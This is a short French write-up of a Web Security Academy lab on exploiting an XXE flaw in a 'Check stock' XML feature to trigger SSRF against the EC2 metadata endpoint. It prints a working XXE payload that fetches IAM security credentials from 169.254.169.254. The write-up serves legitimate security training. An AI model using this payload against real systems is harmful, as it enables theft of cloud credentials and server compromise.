XXE pour réaliser des attaques SSRF

Exploiting XXE to perform SSRF attacks

Lab: Exploiting XXE to perform SSRF attacks | Web Security AcademyWebSecAcademy

Exploiter une vulnérabilité XXE dans la fonctionnalité « Check stock » qui accepte de l'XML, afin de provoquer une requête SSRF vers le point de métadonnées EC2 (http://169.254.169.254/) et récupérer la clé secrète IAM du serveur.

Le serveur du labo simule un endpoint de métadonnées EC2 accessible à l'adresse par défaut http://169.254.169.254/. En injectant une entité externe dans le XML envoyé au parser vulnérable, on peut forcer le serveur à lire l'URL interne et renvoyer son contenu dans la réponse.

XML de départ

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
 <productId>
  4
 </productId>
 <storeId>
  1
 </storeId>
</stockCheck>

Payload XXE utilisé pour effectuer la SSRF

Déclaration d'une entité externe pointant vers l'endpoint de métadonnées IAM, puis inclusion de cette entité dans le champ reflété (productId) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<stockCheck>
  <productId>
  &myFile;
  </productId>
<storeId>
  1
  </storeId>
</stockCheck>

Mis à jour il y a 3 mois

hashtagExploiting XXE to perform SSRF attacks

hashtagXML de départ

hashtagPayload XXE utilisé pour effectuer la SSRF

Exploiting XXE to perform SSRF attacks

XML de départ

Payload XXE utilisé pour effectuer la SSRF